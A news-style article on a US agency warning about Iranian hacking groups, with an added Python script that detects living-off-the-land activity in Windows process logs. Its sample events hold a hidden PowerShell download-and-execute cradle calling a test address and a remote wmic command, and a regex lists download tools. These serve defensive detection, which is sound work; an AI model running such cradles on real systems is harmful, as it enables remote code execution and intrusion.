Iranian hackers ‘may still conduct malicious cyber activity,’ US agencies warn


US Agencies Warn Iranian Hackers Could Still Launch Malicious Cyber Operations

In a series of coordinated briefings earlier this month, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the NSA issued a stark reminder that Iranian cyber‑espionage groups remain capable of conducting malicious activity against American and allied targets, and are likely to do so. While the agencies noted a slowdown in large‑scale ransomware campaigns linked to Tehran, they emphasized that the underlying threat has not fundamentally changed.

According to the joint statement, Iran’s “Cyber‑Evil” units, most notably APT33, APT34, and the MuddyWater group, continue to refine their tactics, techniques, and procedures (TTPs) to evade detection. The agencies warned that these actors are still pursuing a range of objectives, from intelligence‑gathering and supply‑chain sabotage to the deployment of destructive malware capable of disrupting critical infrastructure.

Key Indicators of Ongoing Iranian Threat Activity

  • Increased use of “living‑off‑the‑land” tools: operators are abusing legitimate system utilities (e.g., PowerShell, Windows Management Instrumentation) instead of dropping custom malware, so malicious activity blends in with routine administration and leaves fewer file‑based artifacts for antivirus to catch.
  • Targeted phishing and credential‑stuffing campaigns: Recent reports show Iran‑backed actors focusing on high‑value sectors such as energy, aerospace, and healthcare.
  • Supply‑chain infiltration: Threat actors are still attempting to compromise software update mechanisms and third‑party service providers to gain persistent footholds.
  • Emergence of “dual‑use” capabilities: Some groups are blending espionage tools with destructive payloads, blurring the line between data theft and sabotage.
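
The living‑off‑the‑land bullet above is the one that most changes day‑to‑day detection work: the binaries are signed and legitimate, so the signal has to come from how they are invoked and what spawned them. The script below is an added example written for this article, not code from the agencies or from any vendor, showing the kind of heuristics a defender would run over Windows process‑creation telemetry. The events are constructed and modelled on Security log event ID 4688 fields (NewProcessName, ParentProcessName, CommandLine); the embedded download URL uses an RFC 5737 test address and the hostname FILESRV01 is made up. It decodes PowerShell `-EncodedCommand` payloads (base64 of UTF‑16LE text) so the hidden script is inspected, looks for download cradles in both the visible and decoded command line, and flags shells spawned by the WMI provider host or launched remotely through `wmic process call create`.

```python
"""Flag living-off-the-land (LOTL) activity in Windows process-creation events.

Added example. SAMPLE_EVENTS are constructed, modelled on event ID 4688 fields.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand expects base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Assumed hidden payload for the demo: a classic in-memory download cradle (constructed).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"

SAMPLE_EVENTS = [
    # 0: encoded PowerShell cradle launched through WMI (remote execution pattern)
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_ps(CRADLE)}"},
    # 1: WMI used as a remote launcher from an interactive shell (host name is made up)
    {"NewProcessName": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic /node:FILESRV01 process call create "cmd.exe /c whoami > c:\\w.txt"'},
    # 2: ordinary scheduled script; -ExecutionPolicy must NOT be mistaken for -EncodedCommand
    {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Ops\nightly-backup.ps1"},
    # 3: unrelated service process, should stay silent
    {"NewProcessName": r"C:\Windows\System32\svchost.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
WMIC_CREATE_RE = re.compile(r"process\s+call\s+create", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    tag: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_encoded_switch(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the
    shorthands -e and -ec; -ep / -ex... resolve to -ExecutionPolicy and must not match."""
    if not token.startswith("-"):
        return False
    s = token[1:].lower()
    return s in ("e", "ec") or (len(s) >= 2 and "encodedcommand".startswith(s))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if absent/undecodable."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze(event: dict) -> list:
    """Apply the LOTL heuristics to one process-creation event."""
    findings = []
    child = _basename(event["NewProcessName"])
    parent = _basename(event["ParentProcessName"])
    cmdline = event.get("CommandLine", "")
    to_inspect = cmdline

    if child in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append(Finding("encoded_powershell", decoded))
            to_inspect = f"{cmdline}\n{decoded}"  # search the hidden script as well
    hit = DOWNLOAD_RE.search(to_inspect)
    if hit:
        findings.append(Finding("download_cradle", hit.group(0)))
    if parent == "wmiprvse.exe" and child in SHELLS:
        findings.append(Finding("wmi_spawned_shell", f"{parent} -> {child}"))
    if child == "wmic.exe" and WMIC_CREATE_RE.search(cmdline):
        findings.append(Finding("wmic_process_create", cmdline))
    return findings


def triage(events) -> dict:
    """Map event index -> findings, for events that tripped at least one heuristic."""
    return {i: f for i, ev in enumerate(events) if (f := analyze(ev))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        for h in hits:
            print(f"event {idx}: {h.tag}: {h.detail}")
```

Two design points matter in practice. Decoding the encoded command rather than just flagging `-enc` is what lets an analyst tell a vendor's encoded installer one‑liner from a cradle that pulls a second stage off the network, and running the download regex over the decoded text is what makes the second check fire at all here. The parent/child pairing (WmiPrvSE.exe spawning a shell) is the WMI signal the bullet alludes to; on a real estate you would baseline the parents that legitimately spawn PowerShell before alerting on it.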

Officials from the ODNI underscored that the “strategic patience” observed in recent Iranian operations does not equate to a reduction in risk. Instead, Tehran appears to be recalibrating its approach, focusing on long‑term intelligence collection while reserving destructive capabilities for moments of heightened geopolitical tension.

Recommendations for Organizations and Individuals

To mitigate the evolving Iranian threat, the agencies outlined a set of best‑practice measures:

  1. Adopt a zero‑trust architecture: Verify every user, device, and application before granting access to sensitive resources.
  2. Implement continuous monitoring: Deploy endpoint detection and response (EDR) solutions that can detect anomalous behavior in real time.
  3. Conduct regular threat‑intel briefings: Stay informed about Iran‑linked indicators of compromise (IOCs) through trusted information‑sharing platforms.
  4. Patch and harden critical systems: Prioritize timely updates for operating systems, firmware, and third‑party applications.
  5. Exercise incident‑response drills: Simulate scenarios involving Iranian tactics to test and refine response capabilities.

While the United States continues to bolster its defensive posture, the warning from CISA, the FBI, and the NSA serves as a clear signal: Iranian hackers have not retreated, and their capacity for sophisticated, malicious cyber activity remains intact. Vigilance, collaboration, and proactive security hygiene are essential to countering a threat that, despite recent fluctuations, persists at the strategic core of Iran’s cyber‑operations.
